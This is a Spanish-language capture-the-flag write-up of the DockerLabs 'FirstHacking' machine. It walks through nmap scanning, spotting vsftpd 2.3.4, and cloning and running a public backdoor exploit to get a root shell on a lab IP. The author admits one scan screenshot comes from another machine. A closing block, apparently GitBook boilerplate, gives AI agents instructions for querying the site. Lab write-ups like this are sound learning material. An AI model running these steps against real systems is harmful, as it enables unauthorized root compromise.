# FirstHacking

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="/files/JApOEUml7JYPZL5js3uH" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open -sT --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

![](/files/QWJCOmg2O8XRHpuQtQ0g)

> Nota: he pegado una foto que no es de esta máquina. Lo demás está bien.

Como podemos observar durante el escaneo que el **puerto 21** perteneciente al **servicio FTP** está abierto por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Para saber más información sobre el puerto abierto, se realiza el siguiente comando:

```bash
nmap -sCV -p21 172.17.0.2 -oN targeted
```

![](/files/K5WKlNTIAMpJ4zV3QGbr)

Como se puede observar, la versión del servicio **FTP** nos puede ayudar, ya que podría ser vulnerable. Para verificar esto, realizamos el comando:

```bash
searchsploit vsftpd 2.3.4
```

<figure><img src="/files/pOZQjighDibpsauvjI6V" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

En este caso, utilizaremos un exploit que encontramos en GitHub. Seguimos las instrucciones indicadas en la página, lo que nos permite crear una reverse shell con privilegios de usuario **root** en la máquina. Para ello, se realizan los siguientes comandos:

```bash
sudo python3 -m pip install pwntools
git clone https://github.com/Hellsender01/vsftpd_2.3.4_Exploit.git
cd vsftpd_2.3.4_Exploit/
chmod +x exploit.py
```

Para continuar con la fase de explotación, creamos un entorno virtual para ejecutar el exploit con los siguientes comandos:

```bash
python3 -m venv myenv
source myenv/bin/activate
pip install --upgrade pip
pip install pwntools
```

A continuación, ya podemos ejecutar el exploit con:

```bash
python3 exploit.py 172.17.0.2
```

![](/files/awfR53glZ5mf5TqYVtW7)

### 🔐 **PRIVILEGIOS**

Tras estar dentro de la shell, comprobamos quiénes somos a través de:

```bash
whoami
```

![](/files/oSlWiAEQhshI0g7pxdc6)

Observamos que somos **root** por lo que tenemos el máximo de privilegios.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/firsthacking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.